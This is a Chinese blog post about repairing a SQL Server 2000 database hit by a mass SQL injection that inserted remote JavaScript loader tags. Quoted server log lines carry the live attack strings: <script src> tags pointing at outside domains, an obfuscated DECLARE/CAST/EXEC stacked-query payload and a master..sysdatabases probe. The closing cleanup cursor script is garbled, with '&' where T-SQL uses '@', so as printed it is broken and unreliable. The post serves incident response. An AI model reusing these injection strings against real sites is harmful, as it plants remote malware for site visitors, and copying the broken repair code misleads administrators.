XSS病毒攻击后的数据修复

近期客户网站遭遇JS木马病毒攻击,一般攻击的是SQL SERVER 2000数据库。

其源码如下:

攻击:第一次的时候什么大侠123来着忘记了,这次呢又是这个!~~~

<script src=http://3bom%62%2Ecom/c.js></script>

 

呵呵 看来并非SQL POST         或者  GET 注入了 ,因为我已经将SQL一般注入防止了。

我们看看网站日志:

2008年12月28日    ex081228.log 数据日志:

异常信息:

activity_view.asp key

异常信息:

/news_view.asp key=132|41|80040e07|将_varchar_值

activity_history.asp |41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -

异常信息:

news_view.asp key=226;dEcLaRe%20@S%20VaRcHaR(4000)%20SeT%20@s=cAsT(0xaS%20VaRcHaR(4000));eXeC(@s);--|41|80040e07|将_varchar_值_'2<script_src=http://cn.jxmmtv.com/cn.js></script><script_src=http://cn.daxia123.cn/cn.js></script>'_转换为数据类型为_int_的列时发生语法错误。 -

异常信息:

nfo_view.asp key=30%20AnD%20(sElEcT%20ChAr(94)%2BcAsT(CoUnT(1)%20aS%20VaRcHaR(100))%2bChAr(94)%20fRoM%20[mAsTeR]..[sYsDaTaBaSeS])>0 -

以上信息自己分析吧  ,这里不多讲了

下面处理数据库的SQL程序:

declare &tbName varchar(100),
&colName varchar(100),
&sql varchar(8000),
&str varchar(200),
&dd varchar(50)
declare tb cursor local for
select so.name tbName ,sc.name colName from syscolumns as sc  
inner join sysobjects as so on sc.id=so.id where so.type='U' and sc.xusertype in(175,239,167,231,99,35)
    open tb
        fetch next from tb into &tbName,&colName
        while &&fetch_status=0
            begin
                set &str='<script src=http://3bom%62%2Ecom/c.js>'
                set &dd =''''''
                set &sql='update '+&tbName+ ' set '+&colName+'=REPLACE(convert(varchar(8000),'+&colName+'),'''+&str+''','+&dd+') where  '
                set &sql=&sql+'patindex(''%'+&str+'%'','+&colName+')>0'
                --print &sql
                exec(&sql)
                fetch next from tb into &tbName,&colName
            end
    close tb
deallocate tb  

  

你可能感兴趣的:(sql,SQL Server,asp)